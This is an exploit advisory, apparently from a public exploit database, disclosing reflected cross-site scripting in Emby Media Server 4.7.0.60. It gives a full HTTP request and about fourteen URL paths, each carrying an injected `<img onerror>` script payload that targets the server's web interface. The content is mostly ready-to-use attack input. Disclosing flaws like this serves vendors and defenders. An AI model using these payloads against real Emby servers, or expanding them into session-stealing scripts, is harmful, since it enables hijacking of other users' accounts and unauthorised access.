Emby Media Server version 4.7.0.60 suffers from a cross site scripting vulnerability.
256376262a49c057629921be5beec6fce54d72865c495c12b211bc4fb22ecfaa
# Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting
# Google Dork: NA
# Date: 18/05/2022
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://emby.media/
# Software Link: https://emby.media/windows-server.html
# Version: 4.7.0.60
# Tested on: Windows 7 / 10
Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.
Description: Reflected XSS found on the follwoing paths
GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1
Host: 192.168.1.99:8096
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: max-age=0
/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60
/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn
/web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60
/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60
/web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60
/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60
/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60
/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60
/web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60
/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60
/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60
/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60
/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60
/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60